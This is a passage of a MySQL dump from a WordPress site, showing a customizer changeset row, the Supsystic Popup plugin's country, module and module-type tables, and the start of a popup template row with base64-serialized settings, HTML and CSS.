\"YToxMDp7czo1OiJ0aXRsZSI7czowOiIiO3M6MjE6InR3aXR0ZXJfdGltZWxpbmVfdHlwZSI7czo4OiJ1c2VybmFtZSI7czoyMzoidHdpdHRlcl93aWRnZXRfdXNlcm5hbWUiO3M6MTQ6IkduX2lubm92YXRpb25zIjtzOjE3OiJ0d2l0dGVyX3dpZGdldF9pZCI7czowOiIiO3M6MjA6InR3aXR0ZXJfd2lkZ2V0X3dpZHRoIjtzOjA6IiI7czoyMToidHdpdHRlcl93aWRnZXRfaGVpZ2h0IjtzOjM6IjQwMCI7czoyNjoidHdpdHRlcl93aWRnZXRfdHdlZXRfbGltaXQiO3M6MDoiIjtzOjIwOiJ0d2l0dGVyX3dpZGdldF90aGVtZSI7czo1OiJsaWdodCI7czoyNToidHdpdHRlcl93aWRnZXRfbGlua19jb2xvciI7czo3OiIjM2I5NGQ5IjtzOjI3OiJ0d2l0dGVyX3dpZGdldF9ib3JkZXJfY29sb3IiO3M6NzoiI2Y1ZjVmNSI7fQ==\",\n            \"title\": \"\",\n            \"is_widget_customizer_js_value\": true,\n            \"instance_hash_key\": \"8a4938197cf045c80a0efbaffc6b89a4\"\n        },\n        \"type\": \"option\",\n        \"user_id\": 1\n    }\n}','','','trash','closed','closed','','87bbcdfe-b48d-46af-8893-187ab6c4fff8','','','2017-12-04 13:06:31','2017-12-04 13:06:31','',0,'https://guineeinnove.nimbasolution.com/2017/12/04/87bbcdfe-b48d-46af-8893-187ab6c4fff8/',0,'customize_changeset','',0);
/*!40000 ALTER TABLE `wpfy_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_pps_countries`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_pps_countries` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(128) NOT NULL,
  `iso_code_2` varchar(2) DEFAULT NULL,
  `iso_code_3` varchar(3) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=241 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_pps_countries`
--

LOCK TABLES `wpfy_pps_countries` WRITE;
/*!40000 ALTER TABLE `wpfy_pps_countries` DISABLE KEYS */;
INSERT INTO `wpfy_pps_countries` VALUES (1,'Afghanistan','AF','AFG'),(2,'Albania','AL','ALB'),(3,'Algeria','DZ','DZA'),(4,'American Samoa','AS','ASM'),(5,'Andorra','AD','AND'),(6,'Angola','AO','AGO'),(7,'Anguilla','AI','AIA'),(8,'Antarctica','AQ','ATA'),(9,'Antigua and Barbuda','AG','ATG'),(10,'Argentina','AR','ARG'),(11,'Armenia','AM','ARM'),(12,'Aruba','AW','ABW'),(13,'Australia','AU','AUS'),(14,'Austria','AT','AUT'),(15,'Azerbaijan','AZ','AZE'),(16,'Bahamas','BS','BHS'),(17,'Bahrain','BH','BHR'),(18,'Bangladesh','BD','BGD'),(19,'Barbados','BB','BRB'),(20,'Belarus','BY','BLR'),(21,'Belgium','BE','BEL'),(22,'Belize','BZ','BLZ'),(23,'Benin','BJ','BEN'),(24,'Bermuda','BM','BMU'),(25,'Bhutan','BT','BTN'),(26,'Bolivia','BO','BOL'),(27,'Bosnia and Herzegowina','BA','BIH'),(28,'Botswana','BW','BWA'),(29,'Bouvet Island','BV','BVT'),(30,'Brazil','BR','BRA'),(31,'British Indian Ocean Territory','IO','IOT'),(32,'Brunei Darussalam','BN','BRN'),(33,'Bulgaria','BG','BGR'),(34,'Burkina Faso','BF','BFA'),(35,'Burundi','BI','BDI'),(36,'Cambodia','KH','KHM'),(37,'Cameroon','CM','CMR'),(38,'Canada','CA','CAN'),(39,'Cape Verde','CV','CPV'),(40,'Cayman Islands','KY','CYM'),(41,'Central African Republic','CF','CAF'),(42,'Chad','TD','TCD'),(43,'Chile','CL','CHL'),(44,'China','CN','CHN'),(45,'Christmas Island','CX','CXR'),(46,'Cocos (Keeling) Islands','CC','CCK'),(47,'Colombia','CO','COL'),(48,'Comoros','KM','COM'),(49,'Congo','CG','COG'),(50,'Cook Islands','CK','COK'),(51,'Costa Rica','CR','CRI'),(52,'Cote D\'Ivoire','CI','CIV'),(53,'Croatia','HR','HRV'),(54,'Cuba','CU','CUB'),(55,'Cyprus','CY','CYP'),(56,'Czech Republic','CZ','CZE'),(57,'Denmark','DK','DNK'),(58,'Djibouti','DJ','DJI'),(59,'Dominica','DM','DMA'),(60,'Dominican Republic','DO','DOM'),(61,'East Timor','TP','TMP'),(62,'Ecuador','EC','ECU'),(63,'Egypt','EG','EGY'),(64,'El Salvador','SV','SLV'),(65,'Equatorial Guinea','GQ','GNQ'),(66,'Eritrea','ER','ERI'),(67,'Estonia','EE','EST'),(68,'Ethiopia','ET','ETH'),(69,'Falkland Islands (Malvinas)','FK','FLK'),(70,'Faroe Islands','FO','FRO'),(71,'Fiji','FJ','FJI'),(72,'Finland','FI','FIN'),(73,'France','FR','FRA'),(74,'France, Metropolitan','FX','FXX'),(75,'French Guiana','GF','GUF'),(76,'French Polynesia','PF','PYF'),(77,'French Southern Territories','TF','ATF'),(78,'Gabon','GA','GAB'),(79,'Gambia','GM','GMB'),(80,'Georgia','GE','GEO'),(81,'Germany','DE','DEU'),(82,'Ghana','GH','GHA'),(83,'Gibraltar','GI','GIB'),(84,'Greece','GR','GRC'),(85,'Greenland','GL','GRL'),(86,'Grenada','GD','GRD'),(87,'Guadeloupe','GP','GLP'),(88,'Guam','GU','GUM'),(89,'Guatemala','GT','GTM'),(90,'Guinea','GN','GIN'),(91,'Guinea-bissau','GW','GNB'),(92,'Guyana','GY','GUY'),(93,'Haiti','HT','HTI'),(94,'Heard and Mc Donald Islands','HM','HMD'),(95,'Honduras','HN','HND'),(96,'Hong Kong','HK','HKG'),(97,'Hungary','HU','HUN'),(98,'Iceland','IS','ISL'),(99,'India','IN','IND'),(100,'Indonesia','ID','IDN'),(101,'Iran (Islamic Republic of)','IR','IRN'),(102,'Iraq','IQ','IRQ'),(103,'Ireland','IE','IRL'),(104,'Israel','IL','ISR'),(105,'Italy','IT','ITA'),(106,'Jamaica','JM','JAM'),(107,'Japan','JP','JPN'),(108,'Jordan','JO','JOR'),(109,'Kazakhstan','KZ','KAZ'),(110,'Kenya','KE','KEN'),(111,'Kiribati','KI','KIR'),(112,'Korea, Democratic People\'s Republic of','KP','PRK'),(113,'Korea, Republic of','KR','KOR'),(114,'Kuwait','KW','KWT'),(115,'Kyrgyzstan','KG','KGZ'),(116,'Lao People\'s Democratic Republic','LA','LAO'),(117,'Latvia','LV','LVA'),(118,'Lebanon','LB','LBN'),(119,'Lesotho','LS','LSO'),(120,'Liberia','LR','LBR'),(121,'Libyan Arab Jamahiriya','LY','LBY'),(122,'Liechtenstein','LI','LIE'),(123,'Lithuania','LT','LTU'),(124,'Luxembourg','LU','LUX'),(125,'Macau','MO','MAC'),(126,'Macedonia, The Former Yugoslav Republic of','MK','MKD'),(127,'Madagascar','MG','MDG'),(128,'Malawi','MW','MWI'),(129,'Malaysia','MY','MYS'),(130,'Maldives','MV','MDV'),(131,'Mali','ML','MLI'),(132,'Malta','MT','MLT'),(133,'Marshall Islands','MH','MHL'),(134,'Martinique','MQ','MTQ'),(135,'Mauritania','MR','MRT'),(136,'Mauritius','MU','MUS'),(137,'Mayotte','YT','MYT'),(138,'Mexico','MX','MEX'),(139,'Micronesia, Federated States of','FM','FSM'),(140,'Moldova, Republic of','MD','MDA'),(141,'Monaco','MC','MCO'),(142,'Mongolia','MN','MNG'),(143,'Montenegro','ME','MNE'),(144,'Montserrat','MS','MSR'),(145,'Morocco','MA','MAR'),(146,'Mozambique','MZ','MOZ'),(147,'Myanmar','MM','MMR'),(148,'Namibia','NA','NAM'),(149,'Nauru','NR','NRU'),(150,'Nepal','NP','NPL'),(151,'Netherlands','NL','NLD'),(152,'Netherlands Antilles','AN','ANT'),(153,'New Caledonia','NC','NCL'),(154,'New Zealand','NZ','NZL'),(155,'Nicaragua','NI','NIC'),(156,'Niger','NE','NER'),(157,'Nigeria','NG','NGA'),(158,'Niue','NU','NIU'),(159,'Norfolk Island','NF','NFK'),(160,'Northern Mariana Islands','MP','MNP'),(161,'Norway','NO','NOR'),(162,'Oman','OM','OMN'),(163,'Pakistan','PK','PAK'),(164,'Palau','PW','PLW'),(165,'Panama','PA','PAN'),(166,'Papua New Guinea','PG','PNG'),(167,'Paraguay','PY','PRY'),(168,'Peru','PE','PER'),(169,'Philippines','PH','PHL'),(170,'Pitcairn','PN','PCN'),(171,'Poland','PL','POL'),(172,'Portugal','PT','PRT'),(173,'Puerto Rico','PR','PRI'),(174,'Qatar','QA','QAT'),(175,'Reunion','RE','REU'),(176,'Romania','RO','ROM'),(177,'Russian Federation','RU','RUS'),(178,'Rwanda','RW','RWA'),(179,'Saint Kitts and Nevis','KN','KNA'),(180,'Saint Lucia','LC','LCA'),(181,'Saint Vincent and the Grenadines','VC','VCT'),(182,'Samoa','WS','WSM'),(183,'San Marino','SM','SMR'),(184,'Sao Tome and Principe','ST','STP'),(185,'Saudi Arabia','SA','SAU'),(186,'Senegal','SN','SEN'),(187,'Serbia','RS','SRB'),(188,'Seychelles','SC','SYC'),(189,'Sierra Leone','SL','SLE'),(190,'Singapore','SG','SGP'),(191,'Slovakia (Slovak Republic)','SK','SVK'),(192,'Slovenia','SI','SVN'),(193,'Solomon Islands','SB','SLB'),(194,'Somalia','SO','SOM'),(195,'South Africa','ZA','ZAF'),(196,'South Georgia and the South Sandwich Islands','GS','SGS'),(197,'Spain','ES','ESP'),(198,'Sri Lanka','LK','LKA'),(199,'St. Helena','SH','SHN'),(200,'St. Pierre and Miquelon','PM','SPM'),(201,'Sudan','SD','SDN'),(202,'Suriname','SR','SUR'),(203,'Svalbard and Jan Mayen Islands','SJ','SJM'),(204,'Swaziland','SZ','SWZ'),(205,'Sweden','SE','SWE'),(206,'Switzerland','CH','CHE'),(207,'Syrian Arab Republic','SY','SYR'),(208,'Taiwan','TW','TWN'),(209,'Tajikistan','TJ','TJK'),(210,'Tanzania, United Republic of','TZ','TZA'),(211,'Thailand','TH','THA'),(212,'Togo','TG','TGO'),(213,'Tokelau','TK','TKL'),(214,'Tonga','TO','TON'),(215,'Trinidad and Tobago','TT','TTO'),(216,'Tunisia','TN','TUN'),(217,'Turkey','TR','TUR'),(218,'Turkmenistan','TM','TKM'),(219,'Turks and Caicos Islands','TC','TCA'),(220,'Tuvalu','TV','TUV'),(221,'Uganda','UG','UGA'),(222,'Ukraine','UA','UKR'),(223,'United Arab Emirates','AE','ARE'),(224,'United Kingdom','GB','GBR'),(225,'United States','US','USA'),(226,'United States Minor Outlying Islands','UM','UMI'),(227,'Uruguay','UY','URY'),(228,'Uzbekistan','UZ','UZB'),(229,'Vanuatu','VU','VUT'),(230,'Vatican City State (Holy See)','VA','VAT'),(231,'Venezuela','VE','VEN'),(232,'Viet Nam','VN','VNM'),(233,'Virgin Islands (British)','VG','VGB'),(234,'Virgin Islands (U.S.)','VI','VIR'),(235,'Wallis and Futuna Islands','WF','WLF'),(236,'Western Sahara','EH','ESH'),(237,'Yemen','YE','YEM'),(238,'Zaire','ZR','ZAR'),(239,'Zambia','ZM','ZMB'),(240,'Zimbabwe','ZW','ZWE');
/*!40000 ALTER TABLE `wpfy_pps_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_pps_modules`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_pps_modules` (
  `id` smallint(3) NOT NULL AUTO_INCREMENT,
  `code` varchar(32) NOT NULL,
  `active` tinyint(1) NOT NULL DEFAULT '0',
  `type_id` tinyint(1) NOT NULL DEFAULT '0',
  `label` varchar(64) DEFAULT NULL,
  `ex_plug_dir` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `code` (`code`)
) ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_pps_modules`
--

LOCK TABLES `wpfy_pps_modules` WRITE;
/*!40000 ALTER TABLE `wpfy_pps_modules` DISABLE KEYS */;
INSERT INTO `wpfy_pps_modules` VALUES (1,'adminmenu',1,1,'Admin Menu',NULL),(2,'options',1,1,'Options',NULL),(3,'user',1,1,'Users',NULL),(4,'pages',1,1,'Pages',NULL),(5,'templates',1,1,'templates',NULL),(6,'supsystic_promo',1,1,'supsystic_promo',NULL),(7,'admin_nav',1,1,'admin_nav',NULL),(8,'popup',1,1,'popup',NULL),(9,'subscribe',1,1,'subscribe',NULL),(10,'sm',1,1,'sm',NULL),(11,'statistics',1,1,'statistics',NULL),(12,'mail',1,1,'mail',NULL),(13,'tgm_promo',1,1,'tgm_promo',NULL);
/*!40000 ALTER TABLE `wpfy_pps_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_pps_modules_type`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_pps_modules_type` (
  `id` smallint(3) NOT NULL AUTO_INCREMENT,
  `label` varchar(32) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_pps_modules_type`
--

LOCK TABLES `wpfy_pps_modules_type` WRITE;
/*!40000 ALTER TABLE `wpfy_pps_modules_type` DISABLE KEYS */;
INSERT INTO `wpfy_pps_modules_type` VALUES (1,'system'),(6,'addons');
/*!40000 ALTER TABLE `wpfy_pps_modules_type` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_pps_popup`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_pps_popup` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `label` varchar(255) NOT NULL,
  `active` tinyint(1) NOT NULL,
  `original_id` int(11) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `html` text NOT NULL,
  `css` text NOT NULL,
  `img_preview` varchar(128) DEFAULT NULL,
  `show_on` tinyint(1) NOT NULL DEFAULT '0',
  `show_to` tinyint(1) NOT NULL DEFAULT '0',
  `show_pages` tinyint(1) NOT NULL DEFAULT '0',
  `type_id` tinyint(1) NOT NULL DEFAULT '1',
  `views` int(11) NOT NULL DEFAULT '0',
  `unique_views` int(11) NOT NULL DEFAULT '0',
  `actions` int(11) NOT NULL DEFAULT '0',
  `date_created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `sort_order` mediumint(5) NOT NULL DEFAULT '0',
  `show_in_admin_area` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=50 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_pps_popup`
--

LOCK TABLES `wpfy_pps_popup` WRITE;
/*!40000 ALTER TABLE `wpfy_pps_popup` DISABLE KEYS */;
INSERT INTO `wpfy_pps_popup` VALUES (1,'List Building',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTU6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjIxOiJoaWRlX2Zvcl9kZXZpY2VzX3Nob3ciO3M6MToiMCI7czoyNDoiaGlkZV9mb3JfcG9zdF90eXBlc19zaG93IjtzOjE6IjAiO3M6MTc6ImhpZGVfZm9yX2lwc19zaG93IjtzOjE6IjAiO3M6MTI6ImhpZGVfZm9yX2lwcyI7czowOiIiO3M6MjM6ImhpZGVfZm9yX2NvdW50cmllc19zaG93IjtzOjE6IjAiO3M6MjM6ImhpZGVfZm9yX2xhbmd1YWdlc19zaG93IjtzOjE6IjAiO31zOjM6InRwbCI7YTo1ODp7czo1OiJ3aWR0aCI7czozOiI4MjQiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6OToiYmdfdHlwZV8wIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18wIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjZWJlYmViIjtzOjk6ImJnX3R5cGVfMSI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMSI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzEiO3M6NzoiIzA2NmRhYiI7czo5OiJiZ190eXBlXzIiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzIiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8yIjtzOjc6IiMwMGVhZWEiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjMDAwMDAwIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiMwMDAwMDAiO3M6MTA6ImZvbnRfdHh0XzEiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzEiO3M6NzoiIzAwMDAwMCI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzAwMDAwMCI7czo5OiJjbG9zZV9idG4iO3M6MTE6Imxpc3RzX2JsYWNrIjtzOjc6ImJ1bGxldHMiO3M6MTE6Imxpc3RzX2dyZWVuIjtzOjExOiJsYXllcmVkX3BvcyI7czowOiIiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MTQwOiJUaGUgQmVzdCBXb3JkUHJlc3MgPGkgc3R5bGU9XCJjb2xvcjogIzAwNjlhNztcIj5Qb3BVcCBvcHRpbiBwbHVnaW48L2k+IHRvIGhlbHAgeW91IGdhaW4gbW9yZSBzdWJzY3JpYmVycywgc29jaWFsIGZvbGxvd2VycyBvciBhZHZlcnRpc2VtZW50LiI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJlbmJfdHh0XzEiO3M6MToiMSI7czoxMzoiZW5iX2Zvb3Rfbm90ZSI7czoxOiIxIjtzOjk6ImZvb3Rfbm90ZSI7czoxMTg6IldlIHJlc3BlY3QgeW91ciBwcml2YWN5LiBZb3VyIGluZm9ybWF0aW9uIHdpbGwgbm90IGJlIHNoYXJlZCB3aXRoIGFueSB0aGlyZCBwYXJ0eSBhbmQgeW91IGNhbiB1bnN1YnNjcmliZSBhdCBhbnkgdGltZSAiO3M6MTU6ImVuYl9zbV9mYWNlYm9vayI7czoxOiIxIjtzOjE3OiJlbmJfc21fZ29vZ2xlcGx1cyI7czoxOiIxIjtzOjE0OiJlbmJfc21fdHdpdHRlciI7czoxOiIxIjtzOjk6InNtX2Rlc2lnbiI7czo2OiJzaW1wbGUiO3M6ODoiYW5pbV9rZXkiO3M6NDoibm9uZSI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czowOiIiO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InN1Yl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHN1YnNjcmlwdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTc6IllvdSBzdWJzY3JpYmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHN1YnNjcmlwdGlvbi4gSWYgeW91IGRpZCBub3Qgc3Vic2NyaWJlIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MjU6InN1Yl9yZWRpcmVjdF9lbWFpbF9leGlzdHMiO3M6MDoiIjtzOjEzOiJzdWJfYnRuX2xhYmVsIjtzOjg6IlNpZ24tdXAhIjtzOjEzOiJzdWJfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToic3ViX25ld19tZXNzYWdlIjtzOjEyOToiWW91IGhhdmUgbmV3IHN1YnNjcmliZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBzdWJzY3JpYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjU6InR4dF8wIjtzOjE2MDoiPHA+PGEgaHJlZj1cImh0dHA6Ly9zdXBzeXN0aWMuY29tXCIgdGFyZ2V0PVwiX2JsYW5rXCI+PGltZyBzdHlsZT1cIm1heC13aWR0aDogMjAwcHg7XCIgc3JjPVwiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvc3Vwc3lzdGljX2ljb24ucG5nXCIgYWx0PVwiXCIgLz48L2E+PC9wPiI7czo1OiJ0eHRfMSI7czozMTM6IjxwPlBvcHVwIGJ5IFN1cHN5c3RpYyBsZXRzIHlvdSBlYXNpbHkgY3JlYXRlIGVsZWdhbnQgb3ZlcmxhcHBpbmcgd2luZG93cyB3aXRoIHVubGltaXRlZCBmZWF0dXJlcy4gUG9wLXVwcyB3aXRoIFNsaWRlciwgTGlnaHRib3gsIENvbnRhY3QgYW5kIFN1YnNjcmlwdGlvbiBmb3JtcyBhbmQgbW9yZTo8L3A+PHVsPjxsaT5VbmxpbWl0ZWQgQ29udGVudCBDdXN0b21pemF0aW9uPC9saT48bGk+QXV0byBPcGVuIFBvcHVwczwvbGk+PGxpPkNvbnRhY3QgRm9ybSB3aXRoIHBvcC11cDwvbGk+PGxpPlBvcHVwIE9wZW5pbmcgQW5pbWF0aW9uczwvbGk+PC91bD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjI6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjMiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMiI7fX0=','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			[if enb_txt_1]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_1 ppsPopupTxt_1\">\r\n				[txt_1]\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n		</div>\r\n		<div class=\"ppsRightCol\">\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			[if enb_sm]\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n			[if enb_foot_note]\r\n				<div class=\"ppsFootNote\">\r\n				[foot_note]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 66%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n  	vertical-align: top;\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == 